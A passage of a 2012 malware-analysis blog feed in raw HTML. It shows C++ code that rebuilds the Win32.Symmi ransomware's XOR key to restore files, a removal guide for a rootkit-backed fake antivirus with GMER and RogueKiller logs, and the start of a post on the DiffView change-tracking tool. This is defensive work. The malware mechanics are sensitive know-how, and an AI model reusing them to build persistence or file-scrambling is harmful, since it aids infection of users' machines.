&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Let's restore the files!&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;I've made a little program able to retrieve the key corresponding to a hard drive (&lt;b&gt;the program must be on the same drive than the file to restore&lt;/b&gt;), and apply a XOR with this key on the 100 first bytes of a given file (it does the same as the malware, but as XOR is reversible, it restores the file).&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;Here's the routine to get the key. It's a basic algorithm, but not trivial to reverse...&lt;/span&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;pre class="brush: csharp"&gt;void GetKey(char* &amp;amp; key)
{
 DWORD volumeSerial = 0, modifiedSerial = 0;
 DWORD initial = 0, tmp = 0, tmp2 = 0, result = 0;
 DWORD operand = 0x0A;
 TCHAR buff[1024];
 char keytmp[1024];
 int count = 0;
 
 // Volume info
 GetVolumeInformation(L"\\", NULL, 0, &amp;amp;volumeSerial, NULL, NULL, NULL, NULL);
 
 // Modified 
 modifiedSerial = -volumeSerial;

 memset(keytmp, '\0', 1024); 
 initial = modifiedSerial;
 while(initial != 0)
 {
  tmp = initial / operand;
  tmp2 = tmp * operand;
  result = - (tmp2 - initial);
  result += 0x30; //go to ACSII
  initial = tmp;

  keytmp[count] = (char)result;
  count++;
 }

 // Invert buffer, add -
 key = (char*)malloc(count + 1 + 1); //1 for -, 1 for null byte
 memset(key, '\0', count + 1 + 1);

 key[0] = 0x2D; // - char
 for (u_int i = 0 ; i &amp;lt; count ; i++)
 {
  key[count - i] = keytmp[i];
 }
} &lt;/pre&gt;
&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;The program to restore your files is available here :&amp;nbsp; &lt;/span&gt;&lt;a href="http://tigzy.geekstogo.com/Tools/SymmiDecrypter.exe"&gt;http://tigzy.geekstogo.com/Tools/SymmiDecrypter.exe&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
To use it, &lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;simply move a file to restore on the program icon, it will trigger the program with its path on parameter, and restore the file. It works also by selecting multiple files at once.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-4CP0Ix1dCb4/UHDH6to6FYI/AAAAAAAAAP0/K2_k8aQ2wM0/s1600/decryptAvant.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-4CP0Ix1dCb4/UHDH6to6FYI/AAAAAAAAAP0/K2_k8aQ2wM0/s1600/decryptAvant.PNG" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Before restoring the files&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5kwpKJQqkng/UHDH53re_qI/AAAAAAAAAPw/PwSiE9906pI/s1600/decryptAPRES.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="443" src="http://2.bp.blogspot.com/-5kwpKJQqkng/UHDH53re_qI/AAAAAAAAAPw/PwSiE9906pI/s640/decryptAPRES.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;After restoring the files&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-4CP0Ix1dCb4/UHDH6to6FYI/AAAAAAAAAP0/K2_k8aQ2wM0/s1600/decryptAvant.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-kwZULeJ2e2Y/UHDH8Nbca-I/AAAAAAAAAQA/nPmmXVeZGAs/s1600/decrypted.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="522" src="http://3.bp.blogspot.com/-kwZULeJ2e2Y/UHDH8Nbca-I/AAAAAAAAAQA/nPmmXVeZGAs/s640/decrypted.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Restored file&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-nw7bvvFiZAE/UHDDJaSpVqI/AAAAAAAAAOw/UwOCtqRquEo/s1600/encKey.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/HAd2iwHo04w" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/167182860734703640/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/10/analysis-win32symmi-naked-decryption.html#comment-form" title="2 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/167182860734703640?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/167182860734703640?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/HAd2iwHo04w/analysis-win32symmi-naked-decryption.html" title="[Analysis] Win32.Symmi naked - Decryption" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-2T-uBn8Ib0w/UHC83FUkrKI/AAAAAAAAANU/eAe3_ICvO-w/s72-c/encrypt2.PNG" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/10/analysis-win32symmi-naked-decryption.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkABQ3w4fip7ImA9WhJbEEk.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-7511622650457297893</id><published>2012-09-19T01:44:00.001-07:00</published><updated>2012-09-19T01:52:32.236-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-09-19T01:52:32.236-07:00</app:edited><title>[Rogue] Win 8 security System</title><content type="html">&lt;h2 style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;Windows 8 security system&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;/h2&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;Windows 8 security system&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-WcM1rOHQ8aw/UFmHLGQTsZI/AAAAAAAAAKQ/VwXU7b5VwrE/s1600/win8sec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="446" src="http://3.bp.blogspot.com/-WcM1rOHQ8aw/UFmHLGQTsZI/AAAAAAAAAKQ/VwXU7b5VwrE/s640/win8sec.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
This rogue is a bit hard to remove, as it comes with a rootkit protecting his buddy...&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
We can see the rootkit in a gmer log. It has randomly named driver&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: x-small;"&gt;---- Services - GMER 1.0.15 ----&lt;br /&gt;&lt;br /&gt;Service&amp;nbsp; C:\WINDOWS\System32\Drivers\dc514d8c36b2240e.sys (*** hidden *** )&amp;nbsp;&amp;nbsp;&amp;nbsp; [BOOT] dc514d8c36b2240e&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;-- ROOTKIT !!!&lt;br /&gt;&lt;br /&gt;---- Registry - GMER 1.0.15 ----&lt;br /&gt;&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@ImagePath&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; \SystemRoot\System32\Drivers\dc514d8c36b2240e.sys&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Group&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Boot Bus Extender&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@ErrorControl&amp;nbsp; 0&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Type&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Start&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@Tag&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;br /&gt;Reg&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e@DisplayName&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;---- EOF - GMER 1.0.15 ----&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The rootkit register Registry callbacks in the kernel, and returns ERROR_ACCESS_DENIED on every attempt from the API to open its service registry key (&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: #351c75;"&gt;HKLM\SYSTEM\CurrentControlSet\Services\dc514d8c36b2240e&lt;/span&gt;&lt;span style="color: black;"&gt;). Gmer flags it as hidden due to this error.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-D5KzuBXZ980/UFmCzhAxnlI/AAAAAAAAAJk/VFNetPP75_g/s1600/Gmer.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="484" src="http://2.bp.blogspot.com/-D5KzuBXZ980/UFmCzhAxnlI/AAAAAAAAAJk/VFNetPP75_g/s640/Gmer.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Gmer: rootkit registry key&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-pMvjzF0Se0I/UFmC0Qw56XI/AAAAAAAAAJs/0FVkm5TAeHs/s1600/Gmer2.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="100" src="http://4.bp.blogspot.com/-pMvjzF0Se0I/UFmC0Qw56XI/AAAAAAAAAJs/0FVkm5TAeHs/s640/Gmer2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Gmer: rootkit detected at boot&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
As the rootkit is logged as &lt;b&gt;BOOT&lt;/b&gt;, it will start with the system at boot time, and restart the rogue. When the rogue is deleted, the rootkit will reinstall it. By the way, the driver is not hidden.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-0xuSJVTTWps/UFmDZGr4DNI/AAAAAAAAAJ8/otV-JkS-SOc/s1600/driver.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://3.bp.blogspot.com/-0xuSJVTTWps/UFmDZGr4DNI/AAAAAAAAAJ8/otV-JkS-SOc/s640/driver.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-e2Ys9LJT2NQ/UFmC1ZdF6xI/AAAAAAAAAJ0/jGpsCkUY4no/s1600/driver.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;The only way to remove this dual infection, is to :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Remove the rootkit service key&lt;/b&gt; (or at least change its boot flag to "DISABLED"). This can not been done with the APIs.&lt;/li&gt;
&lt;li&gt;Reboot. The rootkit will not being restarted&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Remove the rogue&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-D5KzuBXZ980/UFmCzhAxnlI/AAAAAAAAAJk/VFNetPP75_g/s1600/Gmer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;You can do this with RogueKiller. You should have this report:&lt;br /&gt;
RogueKiller detects the registry key as "locked" and allow to delete it. &lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;i&gt;RogueKiller V8.0.4 [19/09/2012] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur : tigzy [Droits d'admin]&lt;br /&gt;Mode : Suppression -- Date : 19/09/2012 10:15:54&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux : 0 ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre : 3 ¤¤¤&lt;br /&gt;&lt;b&gt;[RUN][SUSP PATH] HKCU\[...]\Run : bd396e0f9c1c3794.exe (C:\Documents and Settings\tigzy\Local Settings\Application Data\bd396e0f9c1c3794.exe) -&amp;gt; SUPPRIMÉ&lt;br /&gt;[Services][LOCK] HKLM\[...]\ControlSet001\Services\dc514d8c36b2240e -&amp;gt; SUPPRIMÉ&lt;br /&gt;[Services][LOCK] HKLM\[...]\ControlSet002\Services\dc514d8c36b2240e -&amp;gt; SUPPRIMÉ&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-pMvjzF0Se0I/UFmC0Qw56XI/AAAAAAAAAJs/0FVkm5TAeHs/s1600/Gmer2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-e2Ys9LJT2NQ/UFmC1ZdF6xI/AAAAAAAAAJ0/jGpsCkUY4no/s1600/driver.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/cqrPXeBXQZs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/7511622650457297893/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/09/rogue-win-8-security-system.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7511622650457297893?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/7511622650457297893?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/cqrPXeBXQZs/rogue-win-8-security-system.html" title="[Rogue] Win 8 security System" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-WcM1rOHQ8aw/UFmHLGQTsZI/AAAAAAAAAKQ/VwXU7b5VwrE/s72-c/win8sec.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/09/rogue-win-8-security-system.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CE8DRH8zfip7ImA9WhJbEEk.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-6377209660053494517</id><published>2012-09-11T06:34:00.002-07:00</published><updated>2012-09-19T01:21:15.186-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-09-19T01:21:15.186-07:00</app:edited><title>[Tool] DiffView - Test on ZeroAccess</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;/h2&gt;
&lt;h2 style="text-align: center;"&gt;
&lt;span style="color: #3d85c6;"&gt;&lt;span style="font-size: x-large;"&gt;DiffView : Test on ZeroAccess&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
DiffView is a tool able to display the modifications made by a program on the system. &lt;b&gt;You can see which files are modified, which are created&lt;/b&gt;. You can also see &lt;b&gt;which registry keys are modified, which values are created and which datas are modified&lt;/b&gt;.&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
This is useful when &lt;b&gt;analyzing a new piece of malware&lt;/b&gt;, it permits to have a quick overview over the modifications made in the system to find its nevralgic points and weaknesses.&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Here's an example with the latest&lt;i&gt; ZeroAccess (max++)&lt;/i&gt; variant, the so-called "&lt;i&gt;Recycle CLSID&lt;/i&gt;".&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
New files/keys/values are in &lt;b style="background-color: white; color: #0b5394;"&gt;blue&lt;/b&gt;, while modified stuff is in &lt;b&gt;&lt;span style="color: #38761d;"&gt;green&lt;/span&gt;&lt;/b&gt;.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The file analysis is quite simple. Choose a reference time (in minutes) and hit the "Scan files" button. The treeview will then display new/modified files within the choosen range.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The registry analysis is a bit more complete. The quick scan is similar to the file analysis: It will show only modified/new keys, but no information about values.&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
If you want to know which value is modified, the better is to do a quick scan, note the affected keys, restore your VM and then make a backup of the affected keys (tick "&lt;b&gt;Thorough scan&lt;/b&gt;", and click "Snap" button) before to launch the dropper. Once the dropper launched, hit "Scan reg". The thorough scan will then compare the backup with the new state, and give a detailed diff view. &lt;b&gt;This scan is much more slower, so use it only on targeted keys, not on the whole registry&lt;/b&gt;.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QI2-BsBB_IQ/UE7aap-k1TI/AAAAAAAAAJI/ZAvl52BUdLE/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YEl9itk6np4/UE7abX8wrJI/AAAAAAAAAJM/C8TE40eTnvg/s1600/Capture2.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="472" src="http://1.bp.blogspot.com/-YEl9itk6np4/UE7abX8wrJI/AAAAAAAAAJM/C8TE40eTnvg/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Files analysis&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
